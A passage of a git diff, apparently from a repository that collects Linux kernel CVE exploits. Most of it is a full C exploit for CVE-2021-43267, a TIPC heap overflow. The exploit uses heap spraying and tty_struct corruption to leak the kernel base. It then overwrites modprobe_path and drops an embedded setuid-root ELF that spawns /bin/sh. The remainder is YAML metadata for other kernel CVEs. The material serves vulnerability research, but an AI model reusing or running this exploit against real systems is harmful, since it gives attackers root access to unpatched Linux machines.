+ * + * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- + * allows-arbitrary-code-execution/ + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// these are offsets for my kernel, not yours +#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str +#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` +#define MODPROBE_PATH 0x16500E0 // has symbol +#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 +#define GADGET_RET 0x2c51fa // c3 + +// good numbers +#define KEY_SIZE 956 +#define MSG_COUNT 2048 +#define BODY_SIZE 976 +#define SMASH_SIZE 32 +#define TRIES_MAX 8 +#define NEXT_OFFSET 0x8000 + +// some constants +#define NODE_ID 0x11223344 +#define MTYPE 0xAB /* Ac1db34v3rz */ +#define SPRAY_TTY_CNT 0x40 +#define TTY_MAGIC 0x5401 +#define TIPC_UDP_PORT 6118 +#define MSG_COPY 040000 + +// TIPC crap +#define TIPC_VERSION 2 + +// user messages +#define LINK_PROTOCOL 7 +#define LINK_CONFIG 13 + +// message types +#define STATE_MSG 0 +#define RESET_MSG 1 +#define ACTIVATE_MSG 2 +#define MSG_CRYPTO 14 + +// media types +#define MEDIA_TYPE_UDP 3 + +// w0 +#define hdr_msg_size(v) ((v) & 0x1ffff) +#define hdr_size(v) ((v & 0xf) << 21) +#define hdr_user(v) ((v & 0xf) << 25) +#define hdr_nonseq(v) ((v & 1) << 20) +#define hdr_version(v) ((v & 7) << 29) + +// w1 +#define hdr_msg_type(v) ((v & 7) << 29) + +// w2 +#define hdr_link_level_seq(v) (v & 0xffff) + +// w4 +#define hdr_next_send_pkt(v) (v & 0xffff) + +// w5 +#define hdr_media_id(v) (v & 0xff) +#define hdr_session_number(v) ((v & 0xffff) << 16) + +// prototypes +struct message_t { + long type; + uint8_t body[BODY_SIZE]; +}; + +// globals +int g_sockfd = 0; +struct sockaddr_in g_sockaddr; + +// utility +#define info(fmt, args...) report('$', false, fmt, ## args) +#define infov(fmt, args...) 
report('~', false, fmt, ## args) +#define maybe(fmt, args...) report('?', false, fmt, ## args) +#define fatal(fmt, args...) report('!', true, fmt, ## args) +#define info_value64(name, value) infov("%-24s: %016lx", name, value) + +void report(char indicator, bool error, const char *fmt, ...) { + FILE *stream = (error) ? stderr : stdout; + va_list a; + va_start(a, fmt); + fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); + vfprintf(stream, fmt, a); + fprintf(stream, "\n"); + va_end(a); + + if (error) { + exit(-1); // all errors are fatal + } +} + +void usage(char *prog) { + printf("usage: %s \n\n", prog); +} + +static inline void write64(uint8_t *p, uint64_t v) { + *(uint64_t*)(p) = v; +} + +static inline uint64_t read64(uint8_t *p) { + return *(uint64_t*)(p); +} + +#define be32 htonl + +// netlink +int netlink_send( + uint16_t type, uint16_t flags, uint32_t seq, + uint8_t* pkt, size_t pkt_len, + uint8_t **reply_buf, size_t *reply_sz +) { + int sock_fd; + struct sockaddr_nl sa; + memset(&sa, 0, sizeof(struct sockaddr_nl)); + sa.nl_family = AF_NETLINK; + + size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; + uint8_t *pkt_full = malloc(pkt_full_len); + memset(pkt_full, 0, pkt_full_len); + memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); + + struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); + netlink_hdr->nlmsg_len = pkt_full_len; + netlink_hdr->nlmsg_type = type; + netlink_hdr->nlmsg_flags = flags; + netlink_hdr->nlmsg_seq = seq; + netlink_hdr->nlmsg_pid = getpid(); + + if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { + perror("socket"); + return -1; + } + + if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) { + perror("bind"); + return -1; + } + + ssize_t r = sendto( + sock_fd, pkt_full, pkt_full_len, 0, + (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) + ); + + if (r < 0) { + perror("sendto"); + return -1; + } + + free(pkt_full); + + if (reply_buf != NULL) { + struct msghdr m; + memset(&m, 0, 
sizeof(struct msghdr)); + m.msg_iovlen = 1; + m.msg_iov = malloc(sizeof(struct iovec)); + m.msg_iov->iov_base = malloc(0x1000); + m.msg_iov->iov_len = 0x1000; + + size_t nread; + + if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { + goto error; + } + + if (m.msg_iovlen != 1) { + goto error; + } + + *reply_sz = nread; + *reply_buf = malloc(*reply_sz); + memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); + free(m.msg_iov->iov_base); + } + + close(sock_fd); + return 0; + +error: + close(sock_fd); + return -1; +} + +int netlink_enable_tipc_udp(char *str_ip_address) { + uint8_t pkt_ctrl[]={ + 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, + 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, + 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 + }; + + uint8_t *nl_reply; + size_t nl_reply_len = 0; + uint32_t ip_addr; + uint32_t seq; + int r; + + seq = time(NULL); + + ip_addr = inet_addr(str_ip_address); + if (ip_addr == INADDR_NONE) { + fatal("invalid ip address given"); + } + + r = netlink_send( + NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len + ); + + if(r < 0) { + fatal("failed to send netlink control message."); + } + + if (nl_reply_len == 0) { + fatal("did not get netlink control message reply."); + } + + if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { + fatal("tipc support not available."); + } + + uint16_t nlmsg_type = 0; + off_t pos = 0x14; + + while(pos < nl_reply_len - 4) { + struct nlattr *attr = (struct nlattr*)(nl_reply + pos); + if (attr->nla_type == 1) { + nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); + break; + } + pos += attr->nla_len; + if ((attr->nla_len % 4) != 0) { + pos += 4 - (attr->nla_len % 4); + } + } + + if (nlmsg_type == 0) { + fatal("could not find tipc netlink message type."); + } + + uint8_t pkt_tipc_enable_udp[]={ + 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, + 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, + 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, + 0x2c, 0x00, 0x04, 0x80, 
0x14, 0x00, 0x01, 0x00, + 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, + 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 + }; + + *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; + + r = netlink_send( + nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL + ); + + if (r < 0) { + fatal("failed to send netlink tipc udp enable message."); + } + + // the right way is to read back a netlink reply and check if this worked.. + // I chose to go with the scientifically proven method of big chillin' + sleep(2); + + return 0; +} + +// tipc packet routines +void gen_tipc_hdr( + uint8_t *o, + uint32_t w0, uint32_t w1, uint32_t w2, + uint32_t w3, uint32_t w4, uint32_t w5 +) { + uint32_t* o32 = (uint32_t*)o; + o32[0] = be32(w0); + o32[1] = be32(w1); + o32[2] = be32(w2); + o32[3] = be32(w3); + o32[4] = be32(w4); + o32[5] = be32(w5); +} + +ssize_t tipc_send(uint8_t *buf, size_t sz) { + return sendto( + g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) + ); +} + +void tipc_discover() { + uint32_t w0, w1, w2, w3, w4, w5; + uint8_t pkt[24]; + w0 = 0; + w0 |= hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_msg_size(24); + w0 |= hdr_user(LINK_CONFIG); + w0 |= hdr_nonseq(1); + w1 = 0; + w2 = 0; + w3 = NODE_ID; + w4 = 0x1267; + w5 = hdr_media_id(MEDIA_TYPE_UDP); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_a(uint32_t ip) { + uint8_t pkt[56]; + uint32_t *body = (uint32_t*)(pkt + 24); + uint32_t w0, w1, w2, w3, w4, w5; + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(56); + w1 = hdr_msg_type(RESET_MSG); + w2 = hdr_link_level_seq(0x8000); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = 
hdr_session_number(50388); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; + body[pos++] = be32(3500 << 16); + memcpy(body + 4, "UDP1", 4); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_b(uint32_t ip) { + uint8_t pkt[44]; + uint32_t w0, w1, w2, w3, w4, w5; + uint32_t *body = (uint32_t*)(pkt + 24); + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(44); + w1 = hdr_msg_type(STATE_MSG); + w2 = hdr_link_level_seq(1); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = hdr_session_number(50388); + + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; // timestamp + body[pos++] = 0; // max pkt/link tolerance + body[pos++] = 0; // bearer instance + tipc_send(pkt, sizeof(pkt)); +} + +int tipc_link_setup(char *host) { + if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + perror("socket"); + return -1; + } + + memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); + g_sockaddr.sin_family = AF_INET; + g_sockaddr.sin_port = htons(TIPC_UDP_PORT); + + if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { + perror("inet_aton"); + return -1; + } + + tipc_discover(); + tipc_link_state_a(be32(inet_addr(host))); + tipc_link_state_b(be32(inet_addr(host))); + + return 0; +} + +void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { + uint8_t pkt[0x1000]; + uint32_t w0, w1, w2, w3, w4, w5; + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_user(MSG_CRYPTO); + w0 |= hdr_msg_size(24 + 36 + KEY_SIZE); + w1 = 0; + w2 = seqno; + w3 = NODE_ID; + w4 = 0; + w5 = 0; + + memset(pkt, 0, sizeof(pkt)); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + memcpy(pkt+24, "HAXX", 4); + *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); + memset(pkt+24+36, 'C', KEY_SIZE); + 
memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); + memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); + tipc_send(pkt, sizeof(pkt)); +} + +int setup_modprobe_hax() { + // small ELF file matroshka doll that does; + // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); + // write(fd, elfcode, elfcode_len) + // chmod("/tmp/sh", 04755) + // close(fd); + // exit(0); + // + // the dropped ELF simply does: + // setuid(0); + // setgid(0); + // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); + unsigned char elfcode[] = { + 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, + 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, + 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, + 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, + 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, + 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, + 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, + 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, + 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 
0x3e, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, + 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, + 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, + 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, + 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 + }; + + FILE *fp; + + fp = fopen("/tmp/benign", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + fp = fopen("/tmp/hax", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + if (chmod("/tmp/benign", 0777) < 0) { + perror("chmod"); + return -1; + } + + if (chmod("/tmp/hax", 0777) < 0) { + perror("chmod"); + return -1; + } + + return 0; +} + +int main(int argc, char *argv[]) { + uint64_t pty_ops = 0; + uint64_t mybuf = 0; + uint64_t kernel_base = 0; + + uint8_t fake_tty[0x20]; + uint8_t peekbuf[0x2000]; + + int peek_cnt = 1; + int seqno=0; + + int tty_fds[SPRAY_TTY_CNT]; + int queue_id[MSG_COUNT]; + int queue_id_final = 0; + + struct message_t dummy; + dummy.type = MTYPE; + memset(dummy.body, 0x58, BODY_SIZE); + + 
fprintf(stdout, + "\n" + " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" + " -- by blasty --\n\n" + ); + + if (argc != 2) { + usage(argv[0]); + return -1; + } + + info("enabling tipc udp media"); + if (netlink_enable_tipc_udp(argv[1]) < 0) { + fatal("failed to enable tipc udp media"); + } + + info("establish tipc link"); + if (tipc_link_setup(argv[1]) < 0) { + fatal("failed to establish tipc link"); + } + + info("installing helpers"); + if (setup_modprobe_hax() < 0) { + fatal("failed to setup helpers"); + } + + info("create messages queues"); + if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue"); + } + + for(int i = 0; i < MSG_COUNT; i++) { + if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue %d", i); + } + } + + info("spray messages"); + for(int i = 0; i < MSG_COUNT; i++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message in queue %d", i); + } + } + + info("poking holes"); + for(int i = 0; i < MSG_COUNT; i += 2) { + if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to peek message in queue %d", i); + } + } + + info("tipc bug trigger"); + + uint64_t hacked_msg[4]={ + 0, // m_list.prev + 0, // m_list.next + MTYPE, // m_type + 0x2000, // m_ts + }; + + tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); + + info("spraying tty_struct\n"); + for(int i = 0; i < SPRAY_TTY_CNT; i++) { + if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT); + } + } + + for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { + int r = msgrcv( + queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT + ); + + if (r < 0 || r == BODY_SIZE) { + continue; + } + + info("we corrupted a msg_msg size field! 
(took %d peeks)\n", peek_cnt); + + for(int j = 0; j < r; j += 4) { + if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { + continue; + } + + info("found tty_struct at offset 0x%x", j); + pty_ops = read64(peekbuf + j + 0x18); + mybuf = read64(peekbuf + j + 0x40) - 0x408; + + info_value64("pty_ops", pty_ops); + info_value64("our buffer", mybuf); + + memcpy(fake_tty, peekbuf + j, 0x20); + write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); + + // did we hit a master of slave ops ptr? + switch(pty_ops & 0xfff) { + case PTM_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTM_UNIX98_OPS; + break; + + case PTS_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTS_UNIX98_OPS; + break; + + default: + fatal("this should never happen tbh"); + break; + } + + info_value64("kernel base", kernel_base); + break; + } + + if (pty_ops != 0) { + break; + } else { + info("too bad, tty_struct didnt follow corrupted msg_msg."); + } + } + + if (pty_ops == 0) { + for(int i =0; i < SPRAY_TTY_CNT; i++) { + close(tty_fds[i]); + } + + fatal("infoleak failed. 
try again?"); + } + + info_value64("modprobe_path", kernel_base + MODPROBE_PATH); + + dummy.type = MTYPE; + for(int i = 0; i < BODY_SIZE; i+=8) { + write64(dummy.body + i, kernel_base + GADGET_RET); + } + write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); + + info("spray fake pty ops vtable"); + for(int i = 0; i < MSG_COUNT; i++) { + for(int j = 0; j < 8; j++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message %d", i); + } + } + } + + int hacked = 0; + + dummy.type = MTYPE; + for(int try = 0; try < TRIES_MAX; try++) { + info("attempting to corrupt tty_struct (try %d)", try); + + if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message"); + } + + if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to alloc tty_struct"); + } + + if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to receive message"); + } + + tipc_trigger(fake_tty, 0x20, ++seqno); + + int r = 0; + r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); + if (r == 0) { + info("maybe I have some good news.."); + r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); + hacked = 1; + break; + } else { + close(tty_fds[0]); + } + } + + if (!hacked) { + fatal("hacking computer failed."); + } + + info("triggering modprobe\n"); + system("/tmp/benign"); + sleep(1); + + info("popping shell\n"); + system("/tmp/sh"); + + for(int j = 0; j < SPRAY_TTY_CNT; j++) { + close(tty_fds[j]); + } + + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b531d0ec38d85248ec0857c5106f7d22b69..18d4c2aee67cf0b460a91fbe347c5e0b30017f96 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml 
@@ -1,20 +1,20 @@ -id: CVE-2021-4154 -source: https://github.com/Markakd/CVE-2021-4154 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system. - scope-of-influence: - Linux Kernel versions prior to 5.14 rc2 - reference: - - https://bugzilla.redhat.com/show_bug.cgi?id=2034514 - - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id... - - https://security.netapp.com/advisory/ntap-20220225-0004/ - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-4154 - cwe-id: CWE-416 +id: CVE-2021-4154 +source: https://github.com/Markakd/CVE-2021-4154 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system. + scope-of-influence: + Linux Kernel versions prior to 5.14 rc2 + reference: + - https://bugzilla.redhat.com/show_bug.cgi?id=2034514 + - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id... 
+ - https://security.netapp.com/advisory/ntap-20220225-0004/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-4154 + cwe-id: CWE-416 tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd16e4f24bb4117e2ec45106b376d5e9986..d906d816e7b21b2cc095e4de5dc1b3c800b6f2fb 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml 
@@ -1,21 +1,21 @@ -id: CVE-2021-42008 -source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access - scope-of-influence: - Linux 2.1.94~v5.13.12 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 - - https://www.youtube.com/watch?v=d5f9xLK8Vhw - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2021-42008 - cwe-id: CWE-787 - cnvd-id: - kve-id: +id: CVE-2021-42008 +source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access + scope-of-influence: + Linux 2.1.94~v5.13.12 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 + - https://www.youtube.com/watch?v=d5f9xLK8Vhw + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-42008 + cwe-id: CWE-787 + cnvd-id: + kve-id: tags: 协议解码溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f66527f0aa8500f86675b9572d4f56929610f..5beb14e68a3571e352cc1f8e1740f3585d46f8b4 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml 
@@ -1,23 +1,23 @@ -id: CVE-2021-42327 -source: https://github.com/docfate111/CVE-2021-42327 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: | - Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - - scope-of-influence: - Linux kernel before 5.14.14 - - reference: - - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 6.7 - cve-id: CVE-2021-42327 - cwe-id: CWE-787 - cnvd-id: None - kve-id: None - +id: CVE-2021-42327 +source: https://github.com/docfate111/CVE-2021-42327 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: | + Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 + + scope-of-influence: + Linux kernel before 5.14.14 + + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-42327 + + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.7 + cve-id: CVE-2021-42327 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml index 38cb0b6978b4d230aae5c6424612b57b7d344b5c..83f564c5774d62807127dd4471590aaf809927a0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml 
